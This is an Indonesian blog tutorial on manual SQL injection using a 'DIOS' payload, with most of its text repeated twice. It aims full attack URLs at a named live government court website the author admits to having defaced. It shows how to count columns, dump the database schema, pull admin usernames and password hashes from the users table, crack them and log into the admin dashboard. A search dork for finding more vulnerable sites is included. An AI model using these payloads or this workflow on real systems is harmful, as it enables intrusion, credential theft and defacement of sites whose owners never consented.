SQLi with DIOS by cyberscry
tutorial SQLi manual with DIOS v.2
Maaf jika Live Target Kami Web .Id . saya buat sebagai live karena dulu udah pernah saya deface dan saya laporin bug nya tapi admin biasa aja soal itu tidak di path . sedangkan saya masih kurang faham soal path nya :v
Dork : inurl:.php?id= site:
( kembangin )
live : http://pa-palu.go.id/profil/detailhakim.php?id=3
pertama cek web nya vuln SQLi apa tidak dengan cara menambahkan string ( ' ) di belakang angka , jika vuln maka akan muncul error seperti gambar ini
setelah tahu itu vuln SQLi , kita mencari jumlah column yang error untuk mengetahui table nya
Dengan , " order by "
tambah kan +order+by+1--+ di belakang url web yang sudah di beri string ( ' ) jika tampilan kembali normal maka di lanjut angka 2 dan seterusnya sampai error
seperti ini :
http://pa-palu.go.id/profil/detailhakim.php?id=3'+order+by+1--+ [ Normal ]
http://pa-palu.go.id/profil/detailhakim.php?id=3'+order+by+2--+ [ Normal ]
http://pa-palu.go.id/profil/detailhakim.php?id=3'+order+by+3--+ [ Normal ]
http://pa-palu.go.id/profil/detailhakim.php?id=3'+order+by+4--+ [ Normal ]
DAN SETERUSNYA SAMPAI KETEMU ERROR
http://pa-palu.go.id/profil/detailhakim.php?id=3'+order+by+14--+ [ Error ]
Jumlah column Error nya terdapat di nomor 14 , berarti jumlah column sebenarnya Ada 13
Selanjutnya hapus order by hingga kembali ke link semula yang di beri string ( ' ) Kita tambah dengan " +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+ " kenapa angka 1 sampai 13 ? karena jumlah column yang kita cek tadi 1 - 14 dan angka 14 nya error , maka jumlah column nya 1 - 13 , dan jangan lupa di kasih titik sebelum angka
contoh id=3' menjadi id=.3' << sebelum angka 3 ada titik nya
seperti ini hasil nya :
http://pa-palu.go.id/profil/detailhakim.php?id=.3'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+
Nanti Akan muncul angka rahasia , jika tidak muncul maka tinggal kan web nya cari yang lain
angka rahasia nya seperti ini
angka rahasia itu menunjuk ke url kita , jadi url kita di urutan angka 3 ( angka yg muncul di atas) di ganti dengan DIOS maka akan muncul Table database web tersebut ,
DIOS :
/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/
langsung aja kalian isi dios nya
dari awal nya :
http://pa-palu.go.id/profil/detailhakim.php?id=.3'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+
menjadi :
http://pa-palu.go.id/profil/detailhakim.php?id=.3'+union+select+1,2,/*!00000/*!00000%28select%28@x%29from%28select%28@x:=0x00%29,%28select%280%29from%28information_schema.columns%29where%28table_schema=database%28%29%29and%280x00%29in%28@x:=concat+%28@x,0x3c62723e,database%28%29,0x3a3a,table_name,0x203a3a20,column_name%29%29%29%29x%29*/,4,5,6,7,8,9,10,11,12,13--+
maka akan muncul banyak database di web tsb seperti gambar di bawah ini
setelah muncul database kita cari db username dan password admin login , setelah saya cari ternyata username admin login berada di Database USERS seperti yang saya tampil kan di gambar di atas , terkadang info username dan password berbeda-beda di suatu web ,
nah setelah tahu tempat Database username dan password admin kita ambil username dan password nya .
cara nya begini :
hapus DIOS lalu gnti dengan
Concat(username,0x0a,password)
lalu yang di bagian belakang --+ di ganti menjadi
+from+users--+
fokus dan fahami tulisan merah username , password , users , lihat pada gambar
nah awalnya kan begini (DIOS saya tandai warna ijo biar ga bingung) :
http://pa-palu.go.id/profil/detailhakim.php?id=.3'+union+select+1,2,/*!00000/*!00000%28select%28@x%29from%28select%28@x:=0x00%29,%28select%280%29from%28information_schema.columns%29where%28table_schema=database%28%29%29and%280x00%29in%28@x:=concat+%28@x,0x3c62723e,database%28%29,0x3a3a,table_name,0x203a3a20,column_name%29%29%29%29x%29*/,4,5,6,7,8,9,10,11,12,13--+
dan setelah kita ganti maka akan menjadi :
http://pa-palu.go.id/profil/detailhakim.php?id=.3'+union+select+1,2,Concat(username,0x0a,password),4,5,6,7,8,9,10,11,12,13+from+users--+
dan munculah data username dan password web tersebut ^_^
Maaf jika Live Target Kami Web .Id . saya buat sebagai live karena dulu udah pernah saya deface dan saya laporin bug nya tapi admin biasa aja soal itu tidak di path . sedangkan saya masih kurang faham soal path nya :v
Dork : inurl:.php?id= site:
( kembangin )
live : http://pa-palu.go.id/profil/detailhakim.php?id=3
pertama cek web nya vuln SQLi apa tidak dengan cara menambahkan string ( ' ) di belakang angka , jika vuln maka akan muncul error seperti gambar ini
setelah tahu itu vuln SQLi , kita mencari jumlah column yang error untuk mengetahui table nya
Dengan , " order by "
tambah kan +order+by+1--+ di belakang url web yang sudah di beri string ( ' ) jika tampilan kembali normal maka di lanjut angka 2 dan seterusnya sampai error
seperti ini :
http://pa-palu.go.id/profil/detailhakim.php?id=3'+order+by+1--+ [ Normal ]
http://pa-palu.go.id/profil/detailhakim.php?id=3'+order+by+2--+ [ Normal ]
http://pa-palu.go.id/profil/detailhakim.php?id=3'+order+by+3--+ [ Normal ]
http://pa-palu.go.id/profil/detailhakim.php?id=3'+order+by+4--+ [ Normal ]
DAN SETERUSNYA SAMPAI KETEMU ERROR
http://pa-palu.go.id/profil/detailhakim.php?id=3'+order+by+14--+ [ Error ]
Jumlah column Error nya terdapat di nomor 14 , berarti jumlah column sebenarnya Ada 13
Selanjutnya hapus order by hingga kembali ke link semula yang di beri string ( ' ) Kita tambah dengan " +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+ " kenapa angka 1 sampai 13 ? karena jumlah column yang kita cek tadi 1 - 14 dan angka 14 nya error , maka jumlah column nya 1 - 13 , dan jangan lupa di kasih titik sebelum angka
contoh id=3' menjadi id=.3' << sebelum angka 3 ada titik nya
seperti ini hasil nya :
http://pa-palu.go.id/profil/detailhakim.php?id=.3'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+
Nanti Akan muncul angka rahasia , jika tidak muncul maka tinggal kan web nya cari yang lain
angka rahasia nya seperti ini
angka rahasia itu menunjuk ke url kita , jadi url kita di urutan angka 3 ( angka yg muncul di atas) di ganti dengan DIOS maka akan muncul Table database web tersebut ,
DIOS :
/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/
langsung aja kalian isi dios nya
dari awal nya :
http://pa-palu.go.id/profil/detailhakim.php?id=.3'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+
menjadi :
http://pa-palu.go.id/profil/detailhakim.php?id=.3'+union+select+1,2,/*!00000/*!00000%28select%28@x%29from%28select%28@x:=0x00%29,%28select%280%29from%28information_schema.columns%29where%28table_schema=database%28%29%29and%280x00%29in%28@x:=concat+%28@x,0x3c62723e,database%28%29,0x3a3a,table_name,0x203a3a20,column_name%29%29%29%29x%29*/,4,5,6,7,8,9,10,11,12,13--+
maka akan muncul banyak database di web tsb seperti gambar di bawah ini
setelah muncul database kita cari db username dan password admin login , setelah saya cari ternyata username admin login berada di Database USERS seperti yang saya tampil kan di gambar di atas , terkadang info username dan password berbeda-beda di suatu web ,
nah setelah tahu tempat Database username dan password admin kita ambil username dan password nya .
cara nya begini :
hapus DIOS lalu gnti dengan
Concat(username,0x0a,password)
lalu yang di bagian belakang --+ di ganti menjadi
+from+users--+
tulisan yang saya merahin itu bisa berganti-ganti tinggal kita mau mengambil database sebelah mana
fokus dan fahami tulisan merah username , password , users , lihat pada gambar
nah awalnya kan begini (DIOS saya tandai warna ijo biar ga bingung) :
http://pa-palu.go.id/profil/detailhakim.php?id=.3'+union+select+1,2,/*!00000/*!00000%28select%28@x%29from%28select%28@x:=0x00%29,%28select%280%29from%28information_schema.columns%29where%28table_schema=database%28%29%29and%280x00%29in%28@x:=concat+%28@x,0x3c62723e,database%28%29,0x3a3a,table_name,0x203a3a20,column_name%29%29%29%29x%29*/,4,5,6,7,8,9,10,11,12,13--+
dan setelah kita ganti maka akan menjadi :
dan munculah data username dan password web tersebut ^_^
sengaja saya tutup agar tidak kelihatan id pass nya supaya anda belajar sendiri :)
di gambar yang saya tutupin itu adalah username dan password web tersebut , namun password nya harus di hash terlebih dahulu
misalkan CONTOH nanti muncul
super 7ddf32e17a6ac5ce04a8ecbf782ca509
maka username nya adalah super, passwordnya masih berupa kode dan kita harus meng decrypt terlebih dahulu , biasanya decript nya berupa md5 , sha1 dll bisa cari di google ,
contoh di atas
7ddf32e17a6ac5ce04a8ecbf782ca509
setelah saya cari di google ternyata berbentuk decript type md5 yang artinya random
jadi bisa kita simpulkan
username admin = super
password = random
nh kita tinggal mencari login admin setelah itu kita memasukkan username dan password
dan taraaaaaa kita berhasil masuk dasboard admin :) terserah mau di apain :)
maaf nanti nya jika live target ini sudah di path oleh admin web
sekian tutor SQLi dari saya , semoga bermanfaat.
wassalamualaikum wr.wb
special thanks to Mr.Bro_Tx Anonymous Cyber Team yang udah mau ngajarin saya :)
Komentar
Posting Komentar